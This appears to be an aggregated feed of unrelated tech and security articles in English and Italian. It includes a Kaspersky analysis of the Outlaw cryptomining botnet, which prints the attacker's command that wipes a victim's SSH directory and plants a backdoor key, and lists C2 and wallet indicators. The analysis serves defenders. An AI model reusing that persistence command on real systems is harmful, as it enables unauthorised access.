Recently [Glen Akins] reported on Bluesky that the Zigbee-based sensor he had made for his garden’s rear gate was still going strong after a Summer and Winter on the original 2450 lithium coin cell. The construction plans and design for the unit are detailed in a blog post. At the core is the MS88SF2 SoM by Minew, which features a Nordic Semiconductor nRF52840 SoC that provides the Zigbee RF feature as well as the usual MCU shenanigans.

Previously [Glen] had created a similar system that featured buttons to turn the garden lights on or off, as nobody likes stumbling blindly through a dark garden after returning home. Rather than having to fumble around for a button, the system should detect when said rear gate is opened. This would send a notification to [Glen]’s phone as well as activate the garden lights if it’s dark outside.

Although using a reed relay switch seemed like an obvious solution to replace the buttons, holding it closed turned out to require too much power. After looking at a few commercial examples, he settled for a Hall effect sensor solution with the Ti DRV5032FB in a TO-92 package.

Whereas the average person would just have put in a PIR sensor-based solution, this Zigbee solution does come with a lot more smart home creds, and does not require fumbling around with a smartphone or yelling at a voice assistant to turn the garden lights on.

hackaday.com/2025/04/30/buildi…

Metà dei dispositivi mobili nel mondo utilizza ancora sistemi operativi obsoleti, il che li rende facili bersagli per gli attacchi informatici. Lo afferma un nuovo studio di Zimperium. In un contesto di forte aumento degli attacchi contro gli smartphone, gli esperti mettono in guardia dall’elevata vulnerabilità dei dispositivi aziendali e personali.

Una delle tendenze più evidenti è stata la crescita esponenziale del phishing tramite SMS, o smishing. Oggi rappresenta circa il 70% di tutti i casi di phishing su dispositivi mobili. Parallelamente, cresce anche il numero di attacchi tramite chiamate vocali (vishing), con un incremento del 28%. Lo stesso Smishing è aumentato del 22%, consolidando il suo status di uno dei canali di ingegneria sociale più popolari.

Secondo il rapporto, il problema è aggravato non solo dal fatto che gli utenti stessi non installano gli aggiornamenti, ma anche dal fatto che per un quarto di tutti gli smartphone in uso, gli aggiornamenti semplicemente non vengono rilasciati. Ciò significa che spesso gli utenti utilizzano dispositivi obsoleti con periodi di supporto scaduti.

Secondo un recente studio di Qrator Labs, è l’utilizzo a lungo termine di vecchi gadget, per i quali non vengono più rilasciati aggiornamenti di sicurezza, ad aumentare notevolmente il rischio che questi diventino parte di una botnet. Questa minaccia non riguarda solo i proprietari di tali dispositivi, ma anche intere aziende, che diventano regolarmente vittime di attacchi DDoS su larga scala.

Anche la situazione delle applicazioni solleva serie preoccupazioni. Oltre il 60% delle app iOS e un terzo delle app Android non dispongono di una protezione di base del codice e quasi la metà delle app per entrambe le piattaforme sono soggette a perdite di dati personali. I rischi includono l’accesso non autorizzato alla rubrica, alla geolocalizzazione, alle password e ad altre informazioni riservate.

Il malware per dispositivi mobili resta lo strumento principale degli aggressori. Nell’ultimo anno il numero di Trojan è cresciuto del 50% e i ricercatori hanno registrato l’emergere di nuove famiglie di malware, come Vultur, DroidBot, Errorfather e BlankBot. Questi programmi sono specializzati nell’accesso segreto ai dispositivi, nella raccolta di dati, nel tracciamento delle azioni degli utenti e perfino nella cattura dello schermo in tempo reale.

Un’ulteriore minaccia proviene dalle applicazioni scaricate al di fuori degli store ufficiali. A differenza dell’App Store e di Google Play, le fonti di terze parti non vengono sottoposte a controlli rigorosi, il che rende tali applicazioni un canale di distribuzione ideale per trojan, spyware e strumenti di phishing. Allo stesso tempo, anche le applicazioni aziendali interne spesso soffrono di un’architettura debole, di API vulnerabili e della mancanza di meccanismi di sicurezza minimi.

Per ridurre al minimo i rischi, gli esperti raccomandano alle organizzazioni di implementare strumenti di monitoraggio delle minacce mobili in tempo reale, aggiornare regolarmente i dispositivi, limitare l’accesso alle applicazioni non autorizzate e implementare un modello zero-trust. Ciò è particolarmente rilevante in un contesto in cui gli smartphone stanno diventando uno strumento a tutti gli effetti per lavorare con informazioni aziendali riservate.

L'articolo Metà degli smartphone nel mondo è vulnerabile agli attacchi informatici perché obsoleti proviene da il blog della sicurezza informatica.

Nel 2024 il numero di reati informatici ha battuto ogni record e le perdite per aziende e privati ​​hanno raggiunto proporzioni impressionanti. Ciò è affermato dal rapporto annuale del centro crimini su Internet (IC3) dell’FBI. Nel corso dell’anno l’agenzia ha ricevuto quasi 860.000 richieste, ovvero un terzo in più rispetto al 2023.

I danni derivanti da azioni fraudolente e hacker nel 2024, si stima che ammonterà a 16,6 miliardi di dollari, la cifra più alta dalla creazione del centro nel 2000. Solo negli ultimi cinque anni, l’IC3 ha registrato 4,2 milioni di denunce per un totale di 50,5 miliardi di dollari di danni.

Le frodi restano la principale fonte di perdite e il ransomware ha nuovamente conquistato il primo posto tra le minacce alle infrastrutture critiche. I reclami relativi agli attacchi ransomware sono aumentati del 9% e rappresentano quasi la metà di tutti i casi segnalati in questa categoria, ovvero 3.165 incidenti. L’FBI sottolinea che, nonostante le misure attive per contrastare gli aggressori, la portata delle minacce informatiche continua a crescere.

Il rapporto dedica particolare attenzione alla lotta contro il gruppo LockBit, uno dei più attivi nel campo degli attacchi ransomware. Negli ultimi due anni, l’agenzia ha fornito alle vittime più di 1.000 chiavi per decriptare i dati, aiutandole così a evitare pagamenti per un totale di oltre 800 milioni di dollari. Tuttavia, l’FBI ha osservato che le cifre effettive potrebbero essere ancora più elevate, poiché non tutte le vittime denunciano i reati.

L’FBI cita come ragioni di questa crescita la crescente digitalizzazione della vita e sottolinea una maggiore consapevolezza tra i cittadini, che hanno iniziato a contattare l’FBI più spesso. Il rapporto si è concentrato in particolare sulle frodi a livello internazionale. Un numero significativo di attacchi proviene da call center in India e Ghana, da dove si diffondono varie forme di criminalità informatica. La lotta a tali schemi è stata riconosciuta come priorità nazionale, anche se non sono ancora state rese note misure specifiche in questa direzione.

In totale, l’IC3 ha registrato 859.532 reclami, di cui più di un quarto (256.256) riguardavano reali perdite finanziarie. L’importo medio dei danni è stato di 19.372 dollari. La categoria più vulnerabile resta quella degli anziani: sono pervenute 147.127 denunce da parte di persone con più di 60 anni, per un totale di perdite pari a 4,8 miliardi di dollari.

La forma di attacco più diffusa resta il phishing e le sue varianti, con quasi 200.000 denunce. Seguono i casi di estorsione (86.000), le fughe di dati personali (quasi 65.000), le frodi con beni e servizi non pagati (circa 50.000) e le truffe sugli investimenti (oltre 47.000 richieste).

L’agenzia ha attirato l’attenzione anche su un nuovo tipo di frode: i truffatori hanno iniziato a spacciarsi per dipendenti dell’IC3 e a offrire assistenza nella restituzione del denaro rubato, estorcendo in realtà ancora più denaro alle vittime. Secondo gli analisti, con la crescente fiducia nell’IC3, i truffatori sfruttano sempre più il nome dell’agenzia per nuovi stratagemmi.

L’FBI sottolinea che le minacce informatiche stanno diventando sempre più sofisticate e diffuse e possono essere contrastate solo attraverso la consapevolezza collettiva, il coinvolgimento proattivo delle vittime e il coordinamento internazionale.

L'articolo Boom di Reati Informatici: L’FBI Svela un’Impennata Senza Precedenti nel 2024 proviene da il blog della sicurezza informatica.

There are a lot of distractions in daily life, especially with all the different forms of technology and their accompanying algorithms vying for our attention in the modern world. [mar1ash] makes the same observation about our shared experiences fighting to stay sane with all these push notifications and alerts, and wanted something a little simpler that can just tell time and perhaps a few other things. Enter the time brick.

The time brick is a simple way of keeping track of the most basic of things in the real world: time and weather. The device has no buttons and only a small OLED display. Based on an ESP-01 module and housed in a LEGO-like enclosure, the USB-powered clock sits quietly by a bed or computer with no need for any user interaction at all. It gets its information over a Wi-Fi connection configured in the code running on the device, and cycles through not only time, date, and weather but also a series of pre-programmed quotes of a surreal nature, since part of [mar1ash]’s goals for this project was to do something just a little bit outside the norm.

There are a few other quirks in this tiny device as well, including animations for the weather display, a “night mode” that’s automatically activated to account for low-light conditions, and the ability to easily handle WiFi drops and other errors without crashing. All of the project’s code is also available on its GitHub page. As far as design goes, it’s an excellent demonstration that successful projects have to avoid feature creep, and that doing one thing well is often a better design philosophy than adding needless complications.

hackaday.com/2025/04/29/back-t…

Le backdoor come sappiamo sono ovunque e qualora presenti possono essere utilizzate sia da chi le ha richieste ma anche a vantaggio di chi le ha scoperte e questo potrebbe essere un caso emblematico su questo argomento.

​Durante i Giochi Asiatici Invernali del 2025 a Harbin, in Cina, si è verificato un grave incidente di cybersicurezza: le autorità cinesi hanno accusato la National Security Agency (NSA) degli Stati Uniti di aver orchestrato una serie di attacchi informatici mirati contro i sistemi informativi dell’evento e le infrastrutture critiche della provincia di Heilongjiang.

Secondo quanto riportato da MyDrivers, l’NSA avrebbe utilizzato tecniche avanzate per infiltrarsi nei sistemi basati su Windows, inviando pacchetti di dati criptati per attivare presunte backdoor preinstallate nei sistemi operativi Microsoft .​

Le indagini, condotte dal Centro Nazionale per la Risposta alle Emergenze di Virus Informatici e da esperti di sicurezza informatica, hanno rivelato che gli attacchi si sono concentrati su applicazioni specifiche, infrastrutture critiche e settori sensibili. Le tecniche impiegate includevano l’uso di vulnerabilità sconosciute, attacchi di forza bruta e scansioni mirate per individuare file sensibili. In totale, si sono registrati oltre 270.000 tentativi di intrusione, colpendo sistemi cruciali come quelli per la gestione delle informazioni dell’evento, la logistica e la comunicazione .​

Un aspetto particolarmente preoccupante è stato l’invio di dati criptati a dispositivi Windows nella regione, presumibilmente per attivare backdoor integrate nel sistema operativo. Questa scoperta solleva interrogativi sulla sicurezza dei sistemi informatici e sulla possibilità che esistano vulnerabilità intenzionalmente lasciate aperte nei software commerciali.​

Le autorità cinesi hanno identificato tre agenti della NSA e due istituzioni accademiche statunitensi come responsabili degli attacchi, emettendo mandati di cattura internazionali. Questo episodio ha intensificato le tensioni tra Cina e Stati Uniti nel campo della cybersicurezza, evidenziando la crescente importanza della protezione delle infrastrutture digitali in eventi di rilevanza internazionale.​

La comunità internazionale è ora chiamata a riflettere sulla necessità di stabilire norme e accordi per prevenire simili attacchi in futuro. La cooperazione tra nazioni e la trasparenza nello sviluppo e nella gestione dei sistemi informatici diventano fondamentali per garantire la sicurezza e la fiducia nel cyberspazio.​

In conclusione, l’incidente di Harbin rappresenta un campanello d’allarme sulla vulnerabilità delle infrastrutture digitali e sull’urgenza di affrontare le minacce cibernetiche con strategie coordinate e proattive a livello globale.

L'articolo La Cina Accusa la NSA di aver usato Backdoor Native su Windows per hackerare i Giochi Asiatici proviene da il blog della sicurezza informatica.

Molte console di gioco uscite più di 10 anni fa non vengono più utilizzate per lo scopo originale. Tuttavia, uno di questi sistemi, il Nintendo Wii, ha trovato un utilizzo alternativo. L’appassionato ha installato il sistema operativo NetBSD sulla console e lo utilizza come server web.

In passato sono stati realizzati vari progetti per adattare Linux a dispositivi non progettati per eseguire sistemi operativi desktop, tra cui PlayStation 2, PSP e Dreamcast. Tuttavia, la maggior parte di queste iniziative è stata interrotta o non ha ricevuto alcun sostegno regolare. Al contrario NetBSD per Wii continua a evolversi e nella versione stabile 10.1, rilasciata a dicembre 2024, questa piattaforma è supportata alla pari di Raspberry Pi e x86.

La console utilizza un processore IBM Broadway, appartenente alla famiglia PowerPC 750. Tali processori sono stati precedentemente utilizzati in vari sistemi. In questo caso, le risorse del sistema sono state utilizzate per ospitare pagine web statiche.

Per installare NetBSD è stata sfruttata una vulnerabilità nel sistema di messaggistica della scheda SD, che ha consentito l’installazione dell’Homebrew Channel. Attraverso di esso è stata avviata l’immagine del sistema operativo. La console supporta la connessione di una tastiera e di un adattatore Ethernet, incluso il modello RVL-015, ma la compatibilità è mantenuta anche con altri dispositivi.

Dopo aver avviato il sistema, è stato configurato da remoto tramite SSH e sono stati installati i pacchetti necessari tramite il gestore pkgin. Il server web lighttpd è stato scelto perché richiede poche risorse. Il contenuto del sito, preparato utilizzando il generatore di pagine statiche Hugo, è stato trasferito sul dispositivo tramite rsync.

Durante il funzionamento sono state identificate delle limitazioni relative all’elaborazione delle connessioni crittografate. Per ridurre il carico, la crittografia TLS è stata spostata su un server separato utilizzando Caddy, che funge da proxy inverso. Ciò ha permesso di ridurre il volume delle operazioni eseguite direttamente sulla console.

Il sistema viene monitorato eseguendo periodicamente uno script che genera una pagina HTML con le statistiche. L’utilizzo di soluzioni che richiedevano più risorse, come Prometheus, era ritenuto poco pratico a causa della RAM limitata. Anche il processo di sincronizzazione dell’ora tramite ntpd è stato disabilitato e sostituito da un avvio periodico tramite il task scheduler.

Nelle prime 24 ore il sito, ospitato sulla Wii, ha ricevuto un gran numero di visite. Il carico di picco ha raggiunto le 40 richieste al secondo, con l’indicatore che si è poi stabilizzato a circa 10 richieste al secondo.

Secondo la stima dell’autore, il consumo energetico della console in modalità standby è di circa 18 W, il che corrisponde a circa 13,2 kWh al mese. Dopo il riavvio, il sistema torna al menu principale e potrebbe richiedere l’uso del controller originale e del sensore a infrarossi per avviare l’ambiente.

L'articolo Come trasformare il Tuo Vecchio Nintendo Wii in un Server Web! proviene da il blog della sicurezza informatica.

The future of healthy indoor plants, courtesy of AI. (Credit: [Liam])Like so many of us, [Liam] has a big problem. Whether it’s the curse of Brown Thumbs or something else, those darn houseplants just keep dying despite guides always telling you how incredibly easy it is to keep them from wilting with a modicum of care each day, even without opting for succulents or cactuses. In a fit of despair [Liam] decided to pin his hopes on what we have come to accept as the Savior of Humankind, namely ‘AI’, which can stand for a lot of things, but it’s definitely really smart and can even generate pretty pictures, which is something that the average human can not. Hence it’s time to let an LLM do all the smart plant caring stuff with ‘PlantMom’.

Since LLMs (so far) don’t come with physical appendages by default, some hardware had to be plugged together to measure parameters like light, temperature and soil moisture. Add to this a grow light & a water pump and all that remained was to tell the LMM using an extensive prompt (containing Python code) what it should do (keep the plant alive) and what responses (Python methods) are available. All that was left now was to let the ‘AI’ (Google’s Gemma 3) handle it.

To say that this resulted in a dramatic failure along with what reads like an emotional breakdown (on the side of the LLM) would be an understatement. The LLM insisted on turning the grow light on when it should be off and had the most erratic watering responses imaginable based on absolutely incorrect interpretations of the ADC data (flipping dry vs wet). After this episode the poor chili plant’s soil was absolutely saturated and is still trying to dry out, while the ongoing LLM experiment (with empty water tank) has the grow light blasting more often than a weed farm.

So far it seems like that the humble state machine’s job is still safe from being taken over by ‘AI’, and not even brown thumb folk can kill plants this efficiently.

hackaday.com/2025/04/29/compar…

HOWDY GANG. THIS IS DIGITAL POLITICS. I'm Mark Scott, and will be in Brussels this week to interview Microsoft's president Brad Smith. You can watch along here on April 30, or put your name down here for one of the final in-person spots.

In other news, I was also just appointed as a member of an independent committee at the United Kingdom's Ofcom regulator to advise on issues related to the online information environment. More on that here.

— Canadians go to the polls on April 28 amid a barrage of online falsehoods. That won't stop Liberal leader Mark Carney almost certainly winning.

— There's a lot of politics to unpack behind the European Union's collective $790 million antitrust fine against Meta and Apple related to the bloc's new competition rules.

— Brussels spent $52 million in 2024 to implement its online safety regime. Those figures will rise by more than a quarter this year.

Let's get started:

digitalpolitics.co/newsletter0…

Introduction

In a recent incident response case in Brazil, we dealt with a relatively simple, yet very effective threat focused on Linux environments. Outlaw (also known as “Dota”) is a Perl-based crypto mining botnet that typically takes advantage of weak or default SSH credentials for its operations. Previous research ([1], [2]) described Outlaw samples obtained from honeypots. In this article, we provide details from a real incident contained by Kaspersky, as well as publicly available telemetry data about the countries and territories most frequently targeted by the threat actor. Finally, we provide TTPs and best practices that security practitioners can adopt to protect their infrastructures against this type of threat.

Analysis

We started the analysis by gathering relevant evidence from a compromised Linux system. We identified an odd authorized SSH key for a user called suporte (in a Portuguese-speaking environment, this is an account typically used for administrative tasks in the operating system). Such accounts are often configured to have the same username as the password, which is a bad practice, making it easy for the attackers to exploit them. The authorized key belonged to a remote Linux machine user called mdrfckr, a string found in Dota campaigns, which raised our suspicion.

Suspicious authorized key

After the initial SSH compromise, the threat actor downloads the first-stage script, tddwrt7s.sh, using utilities like wget or curl. This artifact is responsible for downloading the dota.tar.gz file from the attackers’ server. Below is the sequence of commands performed by the attacker to obtain and decompress this file, which is rather typical of them. It is interesting to note that the adversary uses both of the previously mentioned utilities to try to download the artifact, since the system may not have one or another.

Chain of commands used by the attackers to download and decompress dota.tar.gz

After the decompression, a hidden directory, named ".configrc5", was created in the user’s home directory with the following structure:

.configrc5 directory structure

Interestingly enough, one of the first execution steps is checking if other known miners are present on the machine using the script a/init0. If any miners are found, the script tries to kill and block their execution. One reason for this is to avoid possible overuse of the RAM and CPU on the target machine.

Routine for killing and blocking known miners

The script also monitors running processes, identifies any that use 40% or more CPU by executing the command ps axf-o"pid %cpu", and for each such process, checks its command line (/proc/$procid/cmdline) for keywords like "kswapd0","tsm","rsync","tor","httpd","blitz", or "mass" using the grep command. If none of these keywords are found ( grep doesn’t return zero), the process is forcefully killed with the kill-9 command; otherwise, the script prints "don't kill", effectively whitelisting Outlaw’s known or expected high-CPU processes, so it doesn’t accidentally kill them.

Processes checks performed by the threat

After the process checks and killing are done, the b/run file is executed, which is responsible for maintaining persistence on the infected machine and executing next-stage malware from its code. For persistence purposes, the attackers used the following command to wipe the existing SSH setup, create a clean .ssh folder, add a new public key for SSH access, and lock down permissions.
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh
The next-stage malware is a Base64-encoded string inside the b/run script that, once decoded, reveals another level of obfuscation: this time an obfuscated Perl script. Interestingly, the attackers left a comment generated by the obfuscator (perlobfuscator.com) in place.

Obfuscated Perl script

We were able to easily deobfuscate the code using an open-source script available on the same website as used by the attackers (perlobfuscator.com/decode-stun…), which led us to the original source code containing a few words in Portuguese.

Deobfuscated Perl script

This Perl script is an IRC-based botnet client that acts as a backdoor on a compromised system. Upon execution, it disguises itself as an rsync process, creates a copy of itself in the background, and ignores termination signals. By default, it connects to a hardcoded IRC server over port 443 using randomly generated nicknames, joining predefined channels to await commands from designated administrators. The bot supports a range of malicious features including command execution, DDoS attacks, port scans, file download, and upload via HTTP. This provides the attackers with a wide range of capabilities to command and control the botnet.

XMRig miner

Another file from the hidden directory, a/kswapd0, is an ELF packed using UPX, as shown in the image below. We were able to easily unpack the binary for analysis.

kswapd0 identification and unpacking

By querying the hash on threat intelligence portals and by statically analyzing the sample, it became clear that this binary is a malicious modified version of XMRig (6.19.0), a cryptocurrency miner.

XMRig version

We also found a configuration file embedded in the binary. This file contains the attacker’s mining information. In our scenario, the configuration was set up to mine Monero using the CPU only, with both OpenCL and CUDA (for GPU mining) disabled. The miner runs in the background, configured for high CPU usage. It also connects to multiple mining pools, including one accessible via Tor, which explains the presence of Tor files inside the .configrc5/a directory. The image below shows an excerpt from this configuration file.

XMRig custom configuration

Victims

Through telemetry data collected from public feeds, we have identified victims of the Outlaw gang mainly in the United States, but also in Germany, Italy, Thailand, Singapore, Taiwan, Canada and Brazil, as shown in the chart below.

Countries and territories where Outlaw is most active< (download)

The following chart shows the distribution of recent victims. We can see that the group was idle from December 2024 through February 2025, then a spike in the number of victims was observed in March 2025.

Number of Outlaw victims by month, September 2024–March 2025 (download)

Recommendations

Since Outlaw exploits weak or default SSH passwords, we recommend that system administrators adopt a proactive approach to hardening their servers. This can be achieved through custom server configurations and by keeping services up to date. Even simple practices, such as using key-based authentication, can be highly effective. However, the /etc/ssh/sshd_config file allows for the use of several additional parameters to improve security. Some general configurations include:

• Port <custom_port_number>: changes the default SSH port to reduce exposure to automated scans.
• Protocol 2: enforces the use of the more secure protocol version.
• PermitRootLogin no: disables direct login as the root user.
• MaxAuthTries <integer>: limits the number of authentication attempts per session.
• LoginGraceTime <time>: defines the amount of time allowed to complete the login process (in seconds unless specified otherwise).
• PasswordAuthentication no: disables password-based login.
• PermitEmptyPasswords no: prevents login with empty passwords.
• X11Forwarding no: disables X11 forwarding (used for running graphical applications remotely).
• PermitUserEnvironment no: prevents users from passing environment variables.
• Banner /etc/ssh/custom_banner: customizes the system login banner.

Consider disabling unused authentication protocols:

• ChallengeResponseAuthentication no
• KerberosAuthentication no
• GSSAPIAuthentication no

Disable tunneling options to prevent misuse of the SSH tunnel feature:

• AllowAgentForwarding no
• AllowTcpForwarding no
• PermitTunnel no

You can limit SSH access to specific IPs or networks using the AllowUsers directive:

• AllowUsers *@10.10.10.217
• AllowUsers *@192.168.0.0/24

Enable public key authentication with:

• PubkeyAuthentication yes

Set parameters to automatically disconnect idle sessions:

• ClientAliveInterval <time>
• ClientAliveCountMax <integer>

The following configuration file serves as a template for hardening the SSH service:
Protocol 2
Port 2222

LoginGraceTime 10
PermitRootLogin no
MaxAuthTries 3
IgnoreRhosts yes
PubkeyAuthentication yes
PasswordAuthentication no
PermitEmptyPasswords no

UsePAM yes
ChallengeResponseAuthentication no
KerberosAuthentication no
GSSAPIAuthentication no

AllowAgentForwarding no
AllowTcpForwarding no
X11Forwarding no
PrintMotd no
PrintLastLog yes
PermitUserEnvironment no
ClientAliveInterval 300
ClientAliveCountMax 2
PermitTunnel no

Banner /etc/ssh/custom_banner
AllowUsers *@10.10.10.217
While outside sshd_config, pairing your config with tools like Fail2Ban or firewalld rate limiting adds another solid layer of protection against brute force.

Conclusion

By focusing on weak or default SSH credentials, Outlaw keeps improving and broadening its Linux-focused toolkit. The group uses a range of evasion strategies, such as concealing files and folders or obfuscated programs, and uses compromised SSH keys to keep access for as long as possible. The IRC-based botnet client facilitates a wide range of harmful operations, such as command execution, flooding, and scanning, while the deployment of customized XMRig miners can divert processing resources to cryptocurrency mining. By hardening SSH configurations (for instance, turning off password authentication), keeping an eye out for questionable processes, and limiting SSH access to trustworthy users and networks, system administrators can greatly lessen this hazard.

Tactics, techniques and procedures

Below are the Outlaw TTPs identified from our malware analysis.

Indicators of Compromise

• 15f7c9af535f4390b14ba03ddb990c732212dde8 (a)
• 982c0318414c3fdf82e3726c4ef4e9021751bbd9 (init0)
• f2b4bc2244ea8596a2a2a041308aa75088b6bbd5 (kswapd0)
• 4d5838c760238b77d792c99e64bd962e73e28435 (run)
• d0ba24f9fad04720dff79f146769d0d8120bf2ff (decoded Perl script)
• 45[.]9[.]148[.]99 (Attacker’s C2)
• 483fmPjXwX75xmkaJ3dm4vVGWZLHn3GDuKycHypVLr9SgiT6oaZgVh26iZRpwKEkTZCAmUS8tykuwUorM3zGtWxPBFqwuxS (Monero wallet)

securelist.com/outlaw-botnet/1…

On a Commodore 64, the computer is normally connected to a monitor with one composite video cable and to an audio device with a second, identical (although uniquely colored) cable. The signals passed through these cables are analog, each generated by a dedicated chip on the computer. Many C64 users may have accidentally swapped these cables when first setting up their machines, but [Matthias] wondered if this could be done purposefully — generating video with the audio hardware and vice versa.

Getting an audio signal from the video hardware on the Commodore is simple enough. The chips here operate at well over the needed frequency for even the best audio equipment, so it’s a relatively straightforward matter of generating an appropriate output wave. The audio hardware, on the other hand, is much less performative by comparison. The only component here capable of generating a fast enough signal to be understood by display hardware of the time is actually the volume register, although due to a filter on the chip the output is always going to be a bit blurred. But this setup is good enough to generate large text and some other features as well.

There are a few other constraints here as well, namely that loading the demos that [Matthias] has written takes so long that the audio can’t be paused while this happens and has to be bit-banged the entire time. It’s an in-depth project that shows mastery of the retro hardware, and for some other C64 demos take a look at this one which is written in just 256 bytes.

youtube.com/embed/_Orvsms7Ils?…

Thanks to [Jan] for the tip!

hackaday.com/2025/04/29/crossi…

A quadrature encoder provides a way to let hardware read movement (and direction) of a shaft, and they can be simple, effective, and inexpensive devices. But [Paulo Marques] observed that when it comes to reading motor speeds with them, what works best at high speeds doesn’t work at low speeds, and vice versa. His solution? PicoEncoder is a library providing a lightweight and robust method of using the Programmable I/O (PIO) hardware on the RP2040 to get better results, even (or especially) from cheap encoders, and do it efficiently.
The results of the sub-step method (blue) resemble a low-pass filter, but is delivered with no delay or CPU burden.
The output of a quadrature encoder is typically two square waves that are out of phase with one another. This data says whether a shaft is moving, and in what direction. When used to measure something like a motor shaft, one can also estimate rotation speed. Count how many steps come from the encoder over a period of time, and use that as the basis to calculate something like revolutions per minute.

[Paulo] points out that one issue with this basic method is that the quality depends a lot on how much data one has to work with. But the slower a motor turns, the less data one gets. To work around this, one can use a different calculation optimized for low speeds, but there’s really no single solution that handles high and low speeds well.

Another issue is that readings at the “edges” of step transitions can have a lot of noise. This can be ignored and assumed to average out, but it’s a source of inaccuracy that gets worse at slower speeds. Finally, while an ideal encoder has individual phases that are exactly 50% duty cycle and exactly 90 degrees out of phase with one another. This is almost never actually the case with cheaper encoders. Again, a source of inaccuracy.

[Paulo]’s solution was to roll his own method with the RP2040’s PIO, using a hybrid approach to effect a “sub-step” quadrature encoder. Compared to simple step counting, PicoEncoder more carefully tracks transitions to avoid problems with noise, and even accounts for phase size differences present in a particular encoder. The result is a much more accurate calculation of motor speed and position without any delays. Most of the work is done by the PIO of the RP2040, which does the low-level work of counting steps and tracking transitions without any CPU time involved. Try it out the next time you need to read a quadrature encoder for a motor!

The PIO is one of the more interesting pieces of functionality in the RP2040 and it’s great to see it used in a such a clever way. As our own Elliot Williams put it when he evaluated the RP2040, the PIO promises never having to bit-bang a solution again.

hackaday.com/2025/04/29/read-m…

It’s not unusual for redundant satellites, rocket stages, or other spacecraft to re-enter the earth’s atmosphere. Usually they pass unnoticed or generate a spectacular light show, and very rarely a few pieces make it to the surface of the planet. Coming up though is something entirely different, a re-entry of a redundant craft in which the object in question might make it to the ground intact. To find out more about the story we have to travel back to the early 1970s, and Kosmos-482. It was a failed Soviet Venera mission, and since its lander was heavily over-engineered to survive entry into the Venusian atmosphere there’s a fascinating prospect that it might survive Earth re-entry.
This model of the earlier Venera 7 probe shows the heavy protection to survive entry into the Venusian atmosphere. Emerezhko, CC BY-SA 4.0.
At the time of writing the re-entry is expected to happen on the 10th of May, but as yet due to its shallow re-entry angle it is difficult to predict where it might land. It is thought to be about a metre across and to weigh just under 500 kilograms, and its speed upon landing is projected to be between 60 and 80 metres per second. Should it hit land rather than water then, its remains are thought to present an immediate hazard only in its direct path.

Were it to be recovered it would be a fascinating artifact of the Space Race, and once the inevitable question of its ownership was resolved — do marine salvage laws apply in space? –we’d expect it to become a world class museum exhibit. If that happens, we look forward to bringing you our report if possible.

This craft isn’t the only surviving relic of the Space Race out there, though it may be the only one we have a chance of seeing up-close. Some of the craft from that era are even still alive.

Header: Moini, CC0.

hackaday.com/2025/04/29/theres…

If you’ve only been around for the Internet age, you may not realize that Hackaday is the successor of electronics magazines. In their heyday, magazines like Popular Electronics, Radio Electronics, and Elementary Electronics brought us projects to build. Hacks, if you will. Just like Hackaday, not all readers are at the same skill level. So you’d see some hat with a blinking light on it, followed by some super-advanced project like a TV typewriter or a computer. Or a picture phone.

In 1982, Radio Electronics, a major magazine of the day, showed plans for building a picture phone. All you needed was a closed-circuit TV camera, a TV, a telephone, and about two shoeboxes crammed full of parts.

Like many picture phones of its day, it was stretching the definition a little. It actually used ham radio-style slow scan TV (SSTV) to send a frame of video about once every eight seconds. That’s not backwards. The frame rate was 0.125 Hz. And while the resulting 128 x 256 image would seem crude today, this was amazing high tech for 1982.

Slow Scan for the Win

Hams had been playing with SSTV for a long time. Early experiments used high-persistence CRTs, so you’d see the image for as long as the phosphor kept glowing. You also had to sit still for the entire eight seconds to send the picture.

It didn’t take long for hams to take advantage of modern circuits to capture the slow input and convert it to a normal TV signal for as long as you wanted, and that’s what this box does as well. Early “scan converters” used video storage tubes that were rejects (because a perfect new one might have cost $50,000). However, cheap digital memory quickly replaced these storage tubes, making SSTV more practical and affordable.
One of Mitsubishi’s Picture Phones
Still, it never really caught on for telephone networks. A few years later, a few commercial products offered similar tech. Atari made a phone that was bought up by Mitsubishi and sold as the Luna, for example, around 1986. Mitsubishi, Sony, and others tried, unsuccessfully, to get the market to accept these slow picture phones. Between the cost of making a call and a minimum of $400 to buy one, though, it was a hard sell.

You might think this sounds like a weekend project with a Pi-Cam, and you are probably right if you did it now. But in 1982, the amount of work it took to make this work was significant. It helped that it used MM5280 dynamic RAM chips, which held a whopping 4,096 bits (not bytes) of memory. The project needed 16 of the chips, which, at the time, were about $5 each. Remember that $80 in those days was a lot more than $80 today, and you had to buy the rest of the parts, the camera (the article estimates that’s $150, alone), and so on. This wasn’t a poor high school student project.

Robot Kits

You could buy entire kits or just key parts, which was a common thing for magazines to do in those days. The kits came from Robot Research, which was known for making SSTV equipment for hams, so it makes sense that they knew how to do this. The author mentions that “this project is not for beginners.” He explains there are nearly 100 ICs on a “tightly-packed double-sided PC board.”

The device had two primary inputs: fast scan from the camera and slow scan from the phone line. Both could be digitized and stored in the memory array. The memory can also output fast scan TV for the monitor or slow scan for the phone line. Obviously, the system was half duplex. If you were sending a picture, you wouldn’t expect to receive a picture at the same time.
This is just the main board!
The input conversion is done with comparators for speed. Luckily, the conversion is only four bits of monochrome, so you only need 16 (IC73-80) to get the job done. The memory speed was also a concern. Each memory chip’s enable line activated while the previous chip’s was half way through with a cycle.

Since there is no microcontroller, the design includes plenty of gates, op amps, bipolar transistors, and the like. The adjacent picture shows just the device’s main board!

Lots of Parts

If you want to dig into the details, you’ll also want to look at part 2. There’s more theory of operation there and the parts list. The article notes that you could record the tones to a cassette tape for later playback, but that you’d “probably need a device from your local phone company to couple the Picture Phone to their lines.” Ah, the days of the DAA.

They even noted in part 2 that connecting a home-built Picture Phone directly to the phone lines was illegal, which was true at the time. Part 3 talks even more about the phone interface (and, that same issue has a very cool roundup of all the computers you could buy in 1982, ranging from $100 to $6,000). Part 4 was all about alignment and yet more about the phone interface.

